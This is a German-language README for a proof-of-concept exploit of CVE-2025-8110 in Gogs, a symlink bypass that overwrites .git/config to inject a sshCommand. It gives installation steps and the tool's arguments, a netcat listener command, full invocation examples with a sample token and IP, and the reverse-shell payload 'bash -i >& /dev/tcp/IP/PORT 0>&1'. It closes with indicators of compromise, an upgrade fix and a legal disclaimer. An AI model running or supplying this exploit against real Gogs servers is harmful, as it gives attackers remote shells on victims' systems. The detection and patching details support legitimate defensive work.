
Gogs RCE PoC - CVE-2025-8110
Proof of Concept für CVE-2025-8110 – Remotecodeausführung in Gogs über Symlink-Bypass und sshCommand-Injection.
Dieser Exploit missbraucht einen Symlink-Bypass in der Gogs-API, um .git/config zu überschreiben und einen bösartigen sshCommand zu injizieren, der eine Reverse-Shell ausführt.
git clone https://github.com/X4BROZER/CVE-2025-8110.git
cd CVE-2025-8110
pip install -r requirements.txt
Argument Beschreibung -u, --url Ziel-Gogs-URL (z.B. http://target:3000) -U, --username Gogs-Benutzername -P, --password Gogs-Passwort -t, --token Gogs-API-Token -lh, --host Ihre IP für Reverse-Shell -lp, --port Ihr Port für Listener -x, --proxy Proxy aktivieren (localhost:8080)
Melden Sie sich bei Gogs an → Einstellungen → Anwendungen → Token generieren
nc -lvnp 4444
python3 exploit.py -u http://target:3000 -U <USERNAME GOGS> -P <PASSWORD GOGS> -t <TOKEN> -lh <ATTACKER IP> -lp <ATTACKER PORT>
python3 exploit.py -u http://localhost:3001 -U amine -P amine -t 44f4e64a1e6353f247050055aa0d3cc13b577ac3 -lh 10.10.17.134 -lp 4444
Erstellt Repository mit Symlink zu .git/config
Verwendet PutContents-API, um in den Symlink zu schreiben
Injiziert sshCommand = bash -c 'bash -i >& /dev/tcp/IP/PORT 0>&1' #
Gogs führt Befehl aus → Reverse-Shell
Fehlerbehebung Problem Lösung Anmeldung fehlgeschlagen Überprüfen Sie Benutzername/Passwort Repo-Erstellung fehlgeschlagen API-Token neu generieren Lesen Timeout Normal – Listener überprüfen Keine Shell Firewall überprüfen, anderen Port versuchen
Indikatoren für Kompromittierung Zufällige 8-stellige Repository-Namen malicious_link-Symlink in Repos sshCommand in .git/config
Behebung Aktualisieren Sie auf Gogs v0.13.4 oder neuer:
wget https://dl.gogs.io/v0.13.4/gogs_v0.13.4_linux_amd64.tar.gz
tar -xzf gogs_v0.13.4_linux_amd64.tar.gz
Rechtlicher Hinweis Dieses Tool dient ausschließlich zu Bildungs- und autorisierten Testzwecken. Unautorisierter Zugriff ist illegal.
Danksagungen Entdeckung: Wiz Research Original PoC: zAbuQasem Exploit: X4BROZER